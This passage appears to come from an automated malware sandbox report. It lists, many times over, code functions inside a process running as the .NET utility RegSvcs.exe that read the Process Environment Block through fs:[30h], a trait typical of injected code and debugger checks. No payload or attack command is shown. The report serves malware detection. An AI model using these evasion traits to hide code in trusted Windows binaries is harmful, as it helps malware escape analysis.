Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov eax, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov eax, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov eax, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018741E8 mov eax, dword ptr fs:[00000030h] 6_2_018741E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9100 mov eax, dword ptr fs:[00000030h] 6_2_017E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9100 mov eax, dword ptr fs:[00000030h] 6_2_017E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9100 mov eax, dword ptr fs:[00000030h] 6_2_017E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EB1E1 mov eax, dword ptr fs:[00000030h] 6_2_017EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EB1E1 mov eax, dword ptr fs:[00000030h] 6_2_017EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EB1E1 mov eax, dword ptr fs:[00000030h] 6_2_017EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01804120 mov eax, dword ptr fs:[00000030h] 6_2_01804120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01804120 mov eax, dword ptr fs:[00000030h] 6_2_01804120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01804120 mov eax, dword ptr fs:[00000030h] 6_2_01804120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01804120 mov eax, dword ptr fs:[00000030h] 6_2_01804120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01804120 mov ecx, dword ptr fs:[00000030h] 6_2_01804120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181513A mov eax, dword ptr fs:[00000030h] 6_2_0181513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181513A mov eax, dword ptr fs:[00000030h] 6_2_0181513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B944 mov eax, dword ptr fs:[00000030h] 6_2_0180B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B944 mov eax, dword ptr fs:[00000030h] 6_2_0180B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01863884 mov eax, dword ptr fs:[00000030h] 6_2_01863884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01863884 mov eax, dword ptr fs:[00000030h] 6_2_01863884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018120A0 mov eax, dword ptr fs:[00000030h] 6_2_018120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018120A0 mov eax, dword ptr fs:[00000030h] 6_2_018120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018120A0 mov eax, dword ptr fs:[00000030h] 6_2_018120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018120A0 mov eax, dword ptr fs:[00000030h] 6_2_018120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018120A0 mov eax, dword ptr fs:[00000030h] 6_2_018120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018120A0 mov eax, dword ptr fs:[00000030h] 6_2_018120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018290AF mov eax, dword ptr fs:[00000030h] 6_2_018290AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181F0BF mov ecx, dword ptr fs:[00000030h] 6_2_0181F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181F0BF mov eax, dword ptr fs:[00000030h] 6_2_0181F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181F0BF mov eax, dword ptr fs:[00000030h] 6_2_0181F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FB02A mov eax, dword ptr fs:[00000030h] 6_2_017FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FB02A mov eax, dword ptr fs:[00000030h] 6_2_017FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FB02A mov eax, dword ptr fs:[00000030h] 6_2_017FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FB02A mov eax, dword ptr fs:[00000030h] 6_2_017FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0187B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0187B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0187B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0187B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0187B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0187B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B8E4 mov eax, dword ptr fs:[00000030h] 6_2_0180B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B8E4 mov eax, dword ptr fs:[00000030h] 6_2_0180B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867016 mov eax, dword ptr fs:[00000030h] 6_2_01867016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867016 mov eax, dword ptr fs:[00000030h] 6_2_01867016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867016 mov eax, dword ptr fs:[00000030h] 6_2_01867016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E58EC mov eax, dword ptr fs:[00000030h] 6_2_017E58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B4015 mov eax, dword ptr fs:[00000030h] 6_2_018B4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B4015 mov eax, dword ptr fs:[00000030h] 6_2_018B4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E40E1 mov eax, dword ptr fs:[00000030h] 6_2_017E40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E40E1 mov eax, dword ptr fs:[00000030h] 6_2_017E40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E40E1 mov eax, dword ptr fs:[00000030h] 6_2_017E40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181002D mov eax, dword ptr fs:[00000030h] 6_2_0181002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181002D mov eax, dword ptr fs:[00000030h] 6_2_0181002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181002D mov eax, dword ptr fs:[00000030h] 6_2_0181002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181002D mov eax, dword ptr fs:[00000030h] 6_2_0181002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181002D mov eax, dword ptr fs:[00000030h] 6_2_0181002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A830 mov eax, dword ptr fs:[00000030h] 6_2_0180A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A830 mov eax, dword ptr fs:[00000030h] 6_2_0180A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A830 mov eax, dword ptr fs:[00000030h] 6_2_0180A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A830 mov eax, dword ptr fs:[00000030h] 6_2_0180A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01800050 mov eax, dword ptr fs:[00000030h] 6_2_01800050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01800050 mov eax, dword ptr fs:[00000030h] 6_2_01800050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2073 mov eax, dword ptr fs:[00000030h] 6_2_018A2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9080 mov eax, dword ptr fs:[00000030h] 6_2_017E9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B1074 mov eax, dword ptr fs:[00000030h] 6_2_018B1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A138A mov eax, dword ptr fs:[00000030h] 6_2_018A138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189D380 mov ecx, dword ptr fs:[00000030h] 6_2_0189D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181B390 mov eax, dword ptr fs:[00000030h] 6_2_0181B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812397 mov eax, dword ptr fs:[00000030h] 6_2_01812397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EDB60 mov ecx, dword ptr fs:[00000030h] 6_2_017EDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EF358 mov eax, dword ptr fs:[00000030h] 6_2_017EF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814BAD mov eax, dword ptr fs:[00000030h] 6_2_01814BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814BAD mov eax, dword ptr fs:[00000030h] 6_2_01814BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814BAD mov eax, dword ptr fs:[00000030h] 6_2_01814BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B5BA5 mov eax, dword ptr fs:[00000030h] 6_2_018B5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EDB40 mov eax, dword ptr fs:[00000030h] 6_2_017EDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018653CA mov eax, dword ptr fs:[00000030h] 6_2_018653CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018653CA mov eax, dword ptr fs:[00000030h] 6_2_018653CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018103E2 mov eax, dword ptr fs:[00000030h] 6_2_018103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018103E2 mov eax, dword ptr fs:[00000030h] 6_2_018103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018103E2 mov eax, dword ptr fs:[00000030h] 6_2_018103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018103E2 mov eax, dword ptr fs:[00000030h] 6_2_018103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018103E2 mov eax, dword ptr fs:[00000030h] 6_2_018103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018103E2 mov eax, dword ptr fs:[00000030h] 6_2_018103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180DBE9 mov eax, dword ptr fs:[00000030h] 6_2_0180DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018923E3 mov ecx, dword ptr fs:[00000030h] 6_2_018923E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018923E3 mov ecx, dword ptr fs:[00000030h] 6_2_018923E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018923E3 mov eax, dword ptr fs:[00000030h] 6_2_018923E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A131B mov eax, dword ptr fs:[00000030h] 6_2_018A131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8B58 mov eax, dword ptr fs:[00000030h] 6_2_018B8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F1B8F mov eax, dword ptr fs:[00000030h] 6_2_017F1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F1B8F mov eax, dword ptr fs:[00000030h] 6_2_017F1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01813B7A mov eax, dword ptr fs:[00000030h] 6_2_01813B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01813B7A mov eax, dword ptr fs:[00000030h] 6_2_01813B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181D294 mov eax, dword ptr fs:[00000030h] 6_2_0181D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181D294 mov eax, dword ptr fs:[00000030h] 6_2_0181D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181FAB0 mov eax, dword ptr fs:[00000030h] 6_2_0181FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9240 mov eax, dword ptr fs:[00000030h] 6_2_017E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9240 mov eax, dword ptr fs:[00000030h] 6_2_017E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9240 mov eax, dword ptr fs:[00000030h] 6_2_017E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9240 mov eax, dword ptr fs:[00000030h] 6_2_017E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812ACB mov eax, dword ptr fs:[00000030h] 6_2_01812ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812AE4 mov eax, dword ptr fs:[00000030h] 6_2_01812AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EAA16 mov eax, dword ptr fs:[00000030h] 6_2_017EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EAA16 mov eax, dword ptr fs:[00000030h] 6_2_017EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E5210 mov eax, dword ptr fs:[00000030h] 6_2_017E5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E5210 mov ecx, dword ptr fs:[00000030h] 6_2_017E5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E5210 mov eax, dword ptr fs:[00000030h] 6_2_017E5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E5210 mov eax, dword ptr fs:[00000030h] 6_2_017E5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F8A0A mov eax, dword ptr fs:[00000030h] 6_2_017F8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01803A1C mov eax, dword ptr fs:[00000030h] 6_2_01803A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AAA16 mov eax, dword ptr fs:[00000030h] 6_2_018AAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AAA16 mov eax, dword ptr fs:[00000030h] 6_2_018AAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01824A2C mov eax, dword ptr fs:[00000030h] 6_2_01824A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01824A2C mov eax, dword ptr fs:[00000030h] 6_2_01824A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FAAB0 mov eax, dword ptr fs:[00000030h] 6_2_017FAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FAAB0 mov eax, dword ptr fs:[00000030h] 6_2_017FAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01874257 mov eax, dword ptr fs:[00000030h] 6_2_01874257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AEA55 mov eax, dword ptr fs:[00000030h] 6_2_018AEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189B260 mov eax, dword ptr fs:[00000030h] 6_2_0189B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189B260 mov eax, dword ptr fs:[00000030h] 6_2_0189B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8A62 mov eax, dword ptr fs:[00000030h] 6_2_018B8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0182927A mov eax, dword ptr fs:[00000030h] 6_2_0182927A
